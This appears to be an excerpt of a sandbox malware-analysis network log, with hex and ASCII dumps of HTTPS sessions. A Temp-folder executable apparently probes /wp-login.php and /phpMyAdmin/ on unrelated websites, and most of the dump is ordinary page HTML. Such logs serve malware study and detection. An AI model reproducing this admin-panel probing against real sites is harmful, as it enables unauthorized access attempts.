2023-12-22 20:15:03 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 69 6f 6e 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 5f 73 69 6d 70 6c 65 6f 5f 63 6f 74 65 6f 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2d 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2d 32 30 31 37 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 6c 6f 67 6f 22 20 61 6c 74 3d 22 46 6c 61 6e 64 72 69 61 20 4c 6f 69 73 69 72 73 22 20 2f 3e 3c 2f 61 3e 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 75 6b 2d 77 69 64 74 68 2d 35 2d 36 40 6c 20 75 6b 2d 6e 61 76 62 61 72 2d 63 6f 6e 74 61 69 6e 65 72 20 75 6b 2d 6e 61 76 62 61 72 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 6f 2d 6d 65 6e 75 2d 64 65 73 6b 74 6f 70 20 22 20 75 6b 2d 6e 61 76 62 61 72 3e 0a 20 20 20 20 20 20 Data Ascii: 2000ion/themes/theme_simpleo_coteo/images/logo-flandria-loisirs-2017.png" itemprop="logo" alt="Flandria Loisirs" /></a> </div> <nav class="uk-width-5-6@l uk-navbar-container uk-navbar-transparent o-menu-desktop " uk-navbar>
2023-12-22 20:15:03 UTC	6	IN	Data Raw: 22 67 2d 74 65 78 Data Ascii: "g-tex
2023-12-22 20:15:03 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:15:03 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 74 2d 69 74 61 6c 69 63 22 3e 65 6e 20 4e 6f 72 64 20 2d 20 50 61 73 2d 64 65 2d 43 61 6c 61 69 73 20 65 74 20 46 72 6f 6e 74 69 c3 a8 72 65 20 42 65 6c 67 65 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 6f 2d 6d 61 69 6e 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 20 69 64 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 2d 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 20 6f 2d 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 2d 2d 68 6f 6d 65 22 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 6b 2d 70 61 Data Ascii: 2000t-italic">en Nord - Pas-de-Calais et Frontire Belge</span> </h1> </div> </div></div><main class="o-main" role="main" id="main"> <div class="o-main-content o-main-content--home" id="content"> <div class="uk-pa
2023-12-22 20:15:03 UTC	6	IN	Data Raw: 20 20 20 20 20 20 Data Ascii:
2023-12-22 20:15:03 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:15:03 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 75 6b 2d 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 6d 6f 62 69 6c 2d 68 6f 6d 65 73 2d 6e 65 75 66 2f 65 75 72 6f 70 61 22 3e 3c 69 6d 67 20 64 61 74 61 2d 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2f 66 69 6c 65 73 2f 38 32 31 35 2f 38 38 37 35 2f 38 38 34 37 2f 6c 6f 67 6f 2d 6d 61 72 71 75 65 2d 65 75 72 6f 70 61 2e 6a Data Ascii: 2000 <li class="uk-text-center"> <a href="https://www.flandria-loisirs.com/mobil-homes-neuf/europa"><img data-src="https://www.flandria-loisirs.com/application/files/8215/8875/8847/logo-marque-europa.j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
222	192.168.2.4	49783	209.124.80.122	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	168	OUT	GET /wp-admin/ HTTP/1.1 Host: cicfl.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	382	IN	HTTP/1.1 302 Found Date: Fri, 22 Dec 2023 20:15:06 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://cicfl.com/wp-login.php?redirect_to=https%3A%2F%2Fcicfl.com%2Fwp-admin%2F&reauth=1 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
223	192.168.2.4	49947	216.194.166.146	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	238	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Fadm-works.com%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: adm-works.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
224	192.168.2.4	50146	104.26.6.37	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	207	OUT	GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:06 UTC	806	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:06 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding set-cookie: site_version_phase=108; expires=Mon, 16-Dec-2024 20:15:06 GMT; path=/ set-cookie: site_version=HDv3; expires=Mon, 16-Dec-2024 20:15:06 GMT; path=/ x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H%2BtaM%2BDn5Tm6eo5JBWH0bc7ejqwA%2BGGsvLfAUwIPJl60%2B0oZkDS1KFbWyENC08F56ETDi%2BVfmbe9G5%2B3T40Rf66PsAppciWTp8LoD2qRS6nv%2F0%2FvZXIbuAhuwu9nzNZRmh0sD28%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08f28b27b3ef-MIA
2023-12-22 20:15:06 UTC	563	IN	Data Raw: 37 63 37 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 Data Ascii: 7c7c<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
2023-12-22 20:15:06 UTC	1369	IN	Data Raw: 6d 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 62 6f 6f 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 Data Ascii: min.css" /><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomai
2023-12-22 20:15:06 UTC	1369	IN	Data Raw: 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 7a 79 77 36 6d 64 73 2e 63 73 73 22 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 Data Ascii: =Noto+Sans:400,700&display=swap"><link rel="stylesheet" href="https://use.typekit.net/zyw6mds.css"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer \|\| [];function gta
2023-12-22 20:15:06 UTC	1369	IN	Data Raw: 68 2d 69 63 6f 6e 2d 77 68 69 74 65 2e 70 6e 67 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 61 6c 74 3d 22 48 65 61 64 65 72 20 4d 6f 62 69 6c 65 20 53 65 61 72 63 68 22 20 62 6f 72 64 65 72 3d 22 30 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 65 61 64 65 72 4d 6f 62 69 6c 65 53 65 61 72 63 68 4d 61 67 46 75 6e 63 28 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 6f 78 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 42 6f 78 44 69 76 49 44 22 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 73 65 61 72 63 68 2e 63 66 6d 22 20 6d 65 74 68 6f 64 3d Data Ascii: h-icon-white.png" tabindex="0" alt="Header Mobile Search" border="0" onclick="headerMobileSearchMagFunc(); return false;"></div><div class="search-box " id="hdv3HeaderSearchBoxDivID"><form action="https://www.HugeDomains.com/domain_search.cfm" method=
2023-12-22 20:15:06 UTC	1369	IN	Data Raw: 20 68 69 64 65 41 74 39 39 31 57 69 64 74 68 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 70 68 6f 6e 65 2d 69 63 6f 6e 2e 70 6e 67 22 20 61 6c 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 65 6c 6c 2d 74 65 78 74 22 3e 2b 31 2d 33 30 33 2d 38 39 33 2d 30 35 35 32 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 68 51 51 51 69 64 65 41 74 39 39 31 57 69 64 74 68 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 44 72 61 77 65 72 4c 61 79 20 22 20 6f 6e 63 6c 69 63 6b 3d 22 20 24 28 20 27 23 6e 61 76 54 6f 67 67 Data Ascii: hideAt991Width"><img src="https://static.HugeDomains.com/images/hdv3-img/phone-icon.png" alt><span class="tell-text">+1-303-893-0552</span></a></div></div></div><nav class="navbar hQQQideAt991Width"><div class="overDrawerLay " onclick=" $( '#navTogg
2023-12-22 20:15:06 UTC	1369	IN	Data Raw: 76 20 63 6c 61 73 73 3d 22 63 61 72 74 2d 69 63 6f 6e 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 70 78 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 68 6f 70 70 69 6e 67 43 61 72 74 4c 69 6e 6b 49 44 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 68 6f 70 70 69 6e 67 20 43 61 72 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 73 68 6f 77 22 3e 53 68 6f 70 70 69 6e 67 20 63 61 72 74 3c 2f 73 70 61 6e 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 Data Ascii: v class="cart-icon" style="padding-top:0px;"><a href="https://www.HugeDomains.com/shopping_cart.cfm" class="whiteLink " id="hdv3HeaderShoppingCartLinkID" aria-label="Shopping Cart"><span class="mobile-show">Shopping cart</span><img src="https://static.Hug
2023-12-22 20:15:06 UTC	1369	IN	Data Raw: 32 37 33 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 70 78 3b 20 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 22 3e 50 72 6f 63 65 73 73 69 6e 67 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 33 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 34 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 35 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 Data Ascii: 273px; margin-top:0px; margin-bottom:0px; display:flex;">Processing<div class="circularJ"><div class="circularJ_1"></div><div class="circularJ_2"></div><div class="circularJ_3"></div><div class="circularJ_4"></div><div class="circularJ_5"></div><di
2023-12-22 20:15:06 UTC	1369	IN	Data Raw: 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 4b 65 79 77 6f 72 64 52 61 6e 6b 65 72 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 64 69 66 2d 6c 22 3e 53 65 65 20 64 65 74 61 69 6c 73 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 72 65 64 69 74 69 20 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 33 30 64 61 79 73 6d 61 6c 6c 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d Data Ascii: ww.HugeDomains.com/payment-plan-setup.cfm?d=KeywordRanker.com" class="link dif-l">See details</a></div><div class="crediti "><ul><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/30daysmallico.png" alt></div><div class=
2023-12-22 20:15:06 UTC	1369	IN	Data Raw: 73 69 6e 67 6c 65 2d 70 72 6f 64 75 63 74 2d 62 6c 6f 63 6b 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6e 2d 62 6c 6f 63 6b 22 3e 0a 3c 68 31 20 69 64 3d 22 6d 61 69 6e 22 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 2d 6e 61 6d 65 22 3e 4b 65 79 77 6f 72 64 52 61 6e 6b 65 72 2e 63 6f 6d 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 2d 74 2d 6e 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 73 61 6c 65 3a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 36 2c 30 39 35 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 73 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 42 75 79 20 6e 6f 77 20 66 6f 72 20 Data Ascii: single-product-block"><div class="bn-block"><h1 id="main" class="domain-name">KeywordRanker.com</h1><p class="d-t-n">This domain is for sale: <span class="green">$6,095</span></p></div><div class="tablet-block-s"><p class="text-center">Buy now for
2023-12-22 20:15:06 UTC	1369	IN	Data Raw: 3d 22 63 69 72 63 75 6c 61 72 4a 5f 38 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 6d 69 64 6c 65 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 35 70 78 3b 22 3e 0a 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 22 3e 6f 72 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 72 69 67 68 74 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 4b 65 79 77 6f Data Ascii: ="circularJ_8"></div></div></button></div><div class="tablet-block-midle" style="padding-bottom:25px;"><span style="font-size:16px;">or</span></div><div class="tablet-block-right"><a href="https://www.HugeDomains.com/payment-plan-setup.cfm?d=Keywo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
225	192.168.2.4	50141	104.17.166.123	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	403	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: www.liberty25.org Accept: / Accept-Encoding: deflate, gzip Cookie: __cfruid=1328995e49fbc51fc6024f7573c2ef9146b1803b-1703276101; __cf_bm=dcgpfec9qqpM41jIjob1ZSgbyJF7hmAh9UuUDPOQm2Y-1703276101-1-AX+K0BviUO3qmKPmlE4Clrq5Uptbru8RwPz6ZJN42KPlSV16HTOV4MUCE7vH63XZ9lAyF0wuO6dhvmvbhMQk/Bs= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	733	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close CF-Ray: 839b08f2ac582239-MIA CF-Cache-Status: MISS Cache-Control: public, s-maxage=300, max-age=30, stale-if-error=21600, stale-while-revalidate=15 Strict-Transport-Security: max-age=31536000 Vary: Accept-Encoding Content-Security-Policy: Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Request-Id: b49c53d6-ebc3-4129-8e00-b20ba70a014e X-Runtime: 0.627405 X-Xss-Protection: 1; mode=block Server: cloudflare alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:07 UTC	636	IN	Data Raw: 63 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 38 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6c 74 2d 69 65 39 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 4c 69 62 65 72 74 79 20 45 6c 65 6d 65 6e 74 61 72 79 20 53 63 68 6f 6f 6c 20 44 69 73 74 72 69 63 74 3c Data Ascii: c93<!DOCTYPE html>...[if lte IE 8]> <html lang="en-US" class="lt-ie9"> <![endif]-->...[if gt IE 8]>...> <html lang="en-US"> ...<![endif]--><head><meta charset="utf-8"><title>404 - Page Not Found - Liberty Elementary School District<
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 66 20 28 77 69 6e 64 6f 77 2e 67 61 29 20 7b 0a 09 09 09 09 09 09 09 09 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 67 61 54 65 73 74 29 3b 0a 09 09 09 09 09 09 09 09 67 61 28 27 63 72 65 61 74 65 27 2c 20 27 55 41 2d 31 39 39 31 39 33 37 37 31 2d 31 27 29 3b 0a 09 09 09 09 09 09 09 09 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 2c 20 27 2f 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2f 77 77 77 2e 6c 69 62 65 72 74 79 32 35 2e 6f 72 67 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 27 29 3b 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 7d 2c 20 31 30 29 3b 0a 09 09 09 09 09 7d 29 28 29 3b 0a 09 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 0a 09 09 09 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d Data Ascii: f (window.ga) {clearInterval(gaTest);ga('create', 'UA-199193771-1');ga('send', 'pageview', '/Page Not Found/www.liberty25.org/phpMyAdmin/');}}, 10);})();</script><script>(function(w,d,s,l,i){w[l]
2023-12-22 20:15:07 UTC	1221	IN	Data Raw: 09 0a 0a 09 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 73 2e 63 66 6d 3f 62 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 09 3c 73 74 79 6c 65 20 69 64 3d 22 66 73 48 53 4c 43 6f 6c 6f 72 73 22 3e 0a 09 09 09 3a 72 6f 6f 74 20 7b 0a 09 09 09 7d 0a 09 09 3c 2f 73 74 79 6c 65 3e 0a 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 75 70 6c 6f 61 64 65 64 2f 74 68 65 6d 65 73 2f 70 6f 6d 66 72 65 74 5f 76 35 2f 6d 61 69 6e 2e 63 73 73 3f 31 36 33 38 35 36 33 34 36 35 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 Data Ascii: <link href="/styles.cfm?b" media="screen" rel="stylesheet"><style id="fsHSLColors">:root {}</style><link rel="stylesheet" media="all" href="/uploaded/themes/pomfret_v5/main.css?1638563465" /><link rel="stylesheet" media="all"
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 37 66 66 61 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 28 66 75 6e 63 74 69 6f 6e 28 77 69 6e 64 6f 77 29 20 7b 0a 09 09 09 77 69 6e 64 6f 77 2e 46 53 2e 63 75 72 72 65 6e 74 50 61 67 65 20 3d 20 7b 0a 09 09 09 09 64 61 74 65 46 6f 72 6d 61 74 3a 20 27 6d 64 27 2c 0a 09 09 09 09 68 6f 6d 65 70 61 67 65 56 69 64 65 6f 4f 70 74 69 6d 69 7a 61 74 69 6f 6e 3a 20 74 72 75 65 2c 0a 09 09 09 09 74 69 6d 65 46 6f 72 6d 61 74 3a 20 27 31 32 27 0a 09 09 09 7d 3b 0a 09 09 09 63 6f 6e 73 74 20 73 65 74 74 69 6e 67 73 20 3d 20 46 53 2e 67 65 74 4e 53 28 27 73 65 74 74 69 6e 67 73 27 29 3b 0a 09 09 09 73 65 74 74 69 6e 67 73 2e 73 74 79 6c 65 4d 61 6e 61 67 65 72 45 6e 61 62 6c 65 64 20 